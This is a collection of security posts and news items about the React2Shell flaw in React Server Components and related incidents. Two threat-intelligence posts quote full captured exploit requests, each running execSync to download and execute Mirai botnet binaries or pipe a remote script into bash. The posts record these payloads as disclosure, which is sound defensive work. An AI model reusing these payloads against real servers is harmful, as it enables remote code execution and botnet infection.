43.228.157[.]64 is trying to exploit CVE-2025-55182 (React2Shell) to spread Mirai Botnet Malware with the command:
POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var+res+=+process.mainModule.require('child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\":+\"$B0\"}"}&1="$@0""

hXXp://83.142.209[.]47/x is a bash script that downloads and executes Mirai variants for different architectures.

#malware #bot #dfir #mirai #react2shell

💥 LexisNexis confirms data breach as hackers leak stolen files

｢ The threat actor says that on February 24 they gained access to the company's AWS infrastructure by exploiting the React2Shell vulnerability in an unpatched React frontend app.
LexisNexis L&P admitted that hackers breached its network, noting that the stolen information was old and consisted mostly of non-critical details ｣

https://www.bleepingcomputer.com/news/security/lexisnexis-confirms-data-breach-as-hackers-leak-stolen-files/

#databreach #React2Shell #LexisNexis #cybersecurity #reactjs

"The $6M Exposure Gap: How Your WAF Can Mitigate Vulnerability Attacks in Your Environment"

- The #React2Shell crisis proved it: traditional WAFs miss 52% of exploits. Discover how to close the $6M exposure gap with AI-native run

by Eliana Vuijsje, Head of Product Marketing at Miggo Security January 28, 2026

176.65.139[.]36 is trying to exploit CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js with the POST:

0="$1"&1={"status":"resolved_model","reason":0,"_response":"$5","value":"{\"then\":\"$4:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}&2="$@3"&3=""&4=[]&5={"_bundlerConfig":{},"_chunks":"$2:_response:_chunks","_formData":{"get":"$4:constructor:constructor"},"_prefix":"(function(){\n try {\n var res = process.mainModule.require(\"child_process\").execSync(\"cd /tmp; rm -rf *; pkill xd.x86; wget hXXp://94.156.152[.]67/xd.x86; curl -O hXXp://94.156.152[.]67/xd.x86; chmod 777 xd.x86; ./xd.x86 nextjs\").toString();\n console.log(\"\\n[ ] RCE RESULT:\\n\" res);\n throw new Error(\"[ ] RCE SUCCESS: \" res);\n

#malware #bot #React2Shell #mirai

It's been a busy 24 hours in the cyber world with significant updates on AI-assisted attacks, actively exploited vulnerabilities, a data exposure incident, new spyware techniques, and a look at AI for defence. Let's dive in:

AI-Augmented FortiGate Breaches 🤖📰

- A Russian-speaking, financially motivated threat actor used commercial generative AI services to breach over 600 FortiGate firewalls across 55 countries between January and February 2026.
- The attacks exploited exposed management interfaces and weak credentials lacking multi-factor authentication, rather than zero-day vulnerabilities, demonstrating how AI lowers the barrier to entry for less skilled actors.
- AI was used to generate attack methodologies, develop custom reconnaissance tools (in Python and Go), plan lateral movement, and draft operational documentation, leading to the extraction of sensitive configurations, Active Directory compromise, and targeting of backup infrastructure, likely for ransomware deployment.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/amazon-ai-assisted-hacker-breached-600-fortigate-firewalls-in-5-weeks/
📰 The Hacker News | https://thehackernews.com/2026/02/ai-assisted-threat-actor-compromises.html

Actively Exploited Vulnerabilities: React2Shell & Roundcube 🕶️📰

- React2Shell (CVE-2025-55182): This critical RCE (CVSS 10.0) in React Server Components is still being actively exploited, with a new "ILovePoop" toolkit used by a possibly state-sponsored actor for reconnaissance against government, defence, finance, and industrial targets globally. Patching is complex due to Next.js bundling React as a 'vendored' package, making it invisible to standard dependency scanners.
- Roundcube Webmail Flaws: CISA has added two actively exploited vulnerabilities to its KEV catalog: CVE-2025-49113 (RCE, CVSS 9.9) and CVE-2025-68461 (XSS, CVSS 7.2). The RCE flaw, a deserialization issue present for over 10 years, was weaponised within 48 hours of public disclosure, with nation-state actors previously targeting Roundcube.
- Organisations should prioritise patching these vulnerabilities, especially React2Shell, which affects default configurations and has seen sophisticated post-exploitation tradecraft, and Roundcube, with a CISA deadline for FCEB agencies by March 13, 2026.

🕶️ Dark Reading | https://www.darkreading.com/application-security/attackers-new-tool-scan-react2shell-exposure
📰 The Hacker News | https://thehackernews.com/2026/02/cisa-adds-two-known-exploited-vulnerabilities-catalog

PayPal Code Error Exposes PII 🕵🏼

- PayPal notified approximately 100 customers of a data exposure incident due to a coding error in its Working Capital loan application, which inadvertently leaked personal information including names, Social Security numbers, dates of birth, email addresses, and business addresses.
- The exposure occurred between July 1, 2025, and December 13, 2025, with a "few" customers also experiencing unauthorised transactions, all of which have been fully refunded by PayPal.
- The company has rolled back the problematic code change, reset affected account passwords, and is offering two years of free credit monitoring to impacted individuals.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/20/paypal_app_code_error_leak/

Predator Spyware's iOS Stealth Techniques 🤖

- Intellexa's Predator spyware can effectively hide iOS camera and microphone recording indicators (the green/orange dots) from users, allowing it to secretly stream audio and video feeds to operators.
- The malware achieves this by leveraging kernel-level access to hook a single function, ‘HiddenDot::setupHook()’, within SpringBoard, which intercepts and nullifies sensor activity updates before they reach the UI layer.
- This sophisticated technique prevents the operating system from displaying any visual cues of active surveillance, making the spyware's activity completely hidden to a regular user, although technical analysis can still reveal malicious processes.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/predator-spyware-hooks-ios-springboard-to-hide-mic-camera-activity/

Anthropic Launches AI for Code Security 📰

- Anthropic has introduced "Claude Code Security," a new feature for its Enterprise and Team customers that uses AI to scan software codebases for vulnerabilities and suggest targeted patches.
- This initiative aims to counter the growing threat of adversaries weaponising AI for automated vulnerability discovery by providing defenders with an AI-powered tool that can reason about code like a human security researcher, tracing data flows and identifying issues missed by traditional static analysis.
- The system includes a multi-stage verification process to filter false positives, assigns severity ratings, and operates with a human-in-the-loop approach, ensuring that no patches are applied without developer review and approval.

📰 The Hacker News | https://thehackernews.com/2026/02/anthropic-launches-claude-code-security.html

#CyberSecurity #ThreatIntelligence #AI #FortiGate #Vulnerabilities #RCE #Roundcube #React2Shell #Spyware #Predator #iOS #DataBreach #PayPal #CodeSecurity #InfoSec #CyberAttack #IncidentResponse

We are seeing a high volume of blocked #DNS queries to the domain linked to the #Mozi botnet and the #React2Shell exploit. This identified malicious domain is provided by our #threatintel partner, ThreatSTOP.

Our proactive DNS filtering is currently preventing these connections to keep your devices secure.

#privacy #security #infosec

Ransomware w odwrocie, ale hakerzy mają nową ulubioną metodę. Raport Cisco Talos Q4 2025

Jeśli myślicie, że największym zagrożeniem dla firmy jest wielki, czerwony komunikat o zaszyfrowaniu dysku, to jesteście w błędzie.

Najnowszy raport Cisco Talos za IV kwartał 2025 pokazuje wyraźną zmianę trendu. Cyberprzestępcy przestali wyważać drzwi razem z futryną (ransomware), a zaczęli wchodzić przez niedomknięte okna (luki w aplikacjach) i kraść klucze od domowników (phishing).

Dziurawe aplikacje to autostrada dla ataku

Aż 40% wszystkich interwencji zespołu Cisco Talos Incident Response dotyczyło wykorzystania luk w publicznie dostępnych aplikacjach. To wciąż numer jeden na liście wektorów ataku. Co gorsza, hakerzy działają błyskawicznie.

W wielu przypadkach atak następował niemal natychmiast po publicznym ujawnieniu nowej podatności (np. w Oracle E-Business Suite czy frameworkach React/Next.js). To wyścig z czasem, który administratorzy często przegrywają. Aż 35% incydentów wynikało z braku aktualizacji – i to nie zawsze najnowszych. Stare, znane od lat exploity wciąż działają, bo firmom „nie chce się” lub „nie opłaca” łatać systemów.

„MFA Fatigue”, czyli zmęczony użytkownik kliknie wszystko

Drugim najczęstszym powodem problemów jest phishing i przejmowanie kont. Ale tu też widać zmianę. Hakerzy nie walczą już z zabezpieczeniami siłowo – oni wykorzystują psychologię. Zjawisko MFA Fatigue (zmęczenie uwierzytelnianiem) zbiera żniwo. Atakujący bombardują ofiarę powiadomieniami z prośbą o potwierdzenie logowania, aż ta – dla świętego spokoju lub z przyzwyczajenia – w końcu kliknie „Zatwierdź”. Cisco punktuje też fatalną konfigurację MFA. Samo wdrożenie dwuetapowego logowania to za mało, jeśli nikt nie monitoruje prób jego obejścia.

Ransomware spada na margines?

To największe zaskoczenie raportu. Incydenty z ransomware stanowiły tylko 13% wszystkich zgłoszeń. Dla porównania:

• Q1 2025: prawie 50%
• Q3 2025: 20%
• Q4 2025: 13%

Nie pojawiły się żadne nowe, rewolucyjne rodziny złośliwego oprogramowania (króluje znany „Qilin”). Wygląda na to, że przestępcy wolą cichą kradzież danych i szantaż bez paraliżowania infrastruktury, co przyciąga mniej uwagi organów ścigania. Ciekawym trendem jest nadużywanie legalnych narzędzi RMM (Remote Monitoring and Management). Hakerzy używają tego samego softu co administratorzy IT, przez co ich ruch w sieci jest trudny do odróżnienia od normalnej pracy.

Administracja publiczna na celowniku

Kto obrywa najmocniej? Sektor publiczny. Ograniczone budżety, przestarzała infrastruktura („dług technologiczny”) i bazy pełne wrażliwych danych obywateli to idealny cel. Urzędy mają też niską tolerancję na przestoje, co sprawia, że są bardziej skłonne do ulegania presji.

Wniosek jest prosty: czas reakcji to dziś jedyna waluta. Jeśli nie załatasz luki w kilka dni (lub godzin) od jej wykrycia, prawdopodobnie ktoś już skanuje Twoje serwery.

AI wymusza wielkie sprzątanie w danych. Raport Cisco: inwestycja w prywatność zwraca się z nawiązką

Attackers Exploiting React2Shell Vulnerability to Attack IT Sectors
https://cybersecuritynews.com/attackers-exploiting-react2shell-vulnerability/

#Infosec #Security #Cybersecurity #CeptBiro #React2Shell #Vulnerability #ITSectors

Январский «В тренде VM»: уязвимости в Windows, React и MongoDB

Хабр, привет! На связи Александр Леонов, ведущий эксперт PT Expert Security Center и дежурный по самым опасным уязвимостям месяца. Мы с командой аналитиков Positive Technologies регулярно исследуем информацию об уязвимостях из баз и бюллетеней безопасности вендоров, социальных сетей, блогов, телеграм-каналов, баз эксплойтов, публичных репозиториев кода и выявляем во всем этом многообразии сведений трендовые уязвимости. Это те уязвимости, которые либо уже эксплуатируются вживую, либо будут эксплуатироваться в ближайшее время. С прошлого дайджеста мы добавили еще три трендовые уязвимости.

https://habr.com/ru/companies/pt/articles/989202/

#windows #mongodb #react #react2shell #onedrive #трендовые_уязвимости #уязвимости_и_их_эксплуатация #maxpatrol_vm #управление_уязвимостями #dbugs